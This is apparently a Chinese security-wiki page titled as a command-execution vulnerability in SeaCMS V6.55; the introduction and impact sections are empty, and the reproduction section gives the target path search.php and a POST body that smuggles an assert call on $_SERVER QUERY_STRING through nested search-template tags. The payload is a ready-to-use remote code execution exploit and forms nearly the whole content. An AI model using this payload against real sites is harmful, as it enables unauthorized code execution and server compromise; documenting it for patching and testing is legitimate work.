跳转至

海洋CMS seacms V6.55 命令执行

一、漏洞简介

二、漏洞影响

三、复现过程

path:

http://url/search.php

POST:

searchtype=5&searchword={if{searchpage:year}&year=:as{searchpage:area}}&area=s{searchpage:letter}&letter=ert{searchpage:lang}&yuyan=($_SE{searchpage:jq}&jq=RVER{searchpage:ver}&&ver=[QUERY_STRING]));/*